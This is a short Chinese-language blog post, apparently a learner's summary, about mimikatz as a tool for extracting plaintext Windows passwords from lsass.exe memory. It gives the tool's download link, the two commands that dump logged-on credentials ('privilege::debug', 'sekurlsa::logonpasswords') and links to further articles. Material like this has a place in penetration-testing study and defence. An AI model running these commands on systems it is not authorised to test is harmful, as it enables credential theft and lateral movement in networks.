mimikatz-域密碼獲取神器


mimikatz是一個法國人寫的輕量級調試器。出眾之處在於其可以直接從 lsass.exe 里獵取windows處於active狀態賬號明文密碼,非常強大。

在網上找了一些相關的文章自己的一點總結吧

下載地址:https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170409

mimikatz_trunk為編譯好的exe文件

mimikatz_master為源碼文件

下面是在我機器上的運行結果:(版本2.1.1,64位OS)

 

這個軟件被稱為密碼抓取神器,mimikatz2.0以后的版本抓取密碼很簡單,只需要兩步:

第一條(提升權限)

privilege::debug

第二條(抓取密碼)

sekurlsa::logonpasswords

效果圖:

 

 另外還有一些關於介紹這個軟件的網址,信息量很大,很多不懂和未知,可能這款神器還有其他的用處,但是感覺下面的內容也有一些版本原因的“過時”吧:

1.《mimikatz》(英文網站,但是里面的介紹和評論區有很多內容) ;文章地址:http://blog.gentilkiwi.com/mimikatz

2.《mimikatz手冊1【竊】》 (沒看懂);文章地址:https://betamao.me/mimikatz-man1.html

3.《神器mimikatz使用命令方法總結》(有一些常規命令) ;文章地址:http://www.2cto.com/article/201407/318229.html

4.《關於mimikatz的玩法(私人技巧)》 ;文章地址:http://www.goldfire.cc/index.php/archives/1244


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM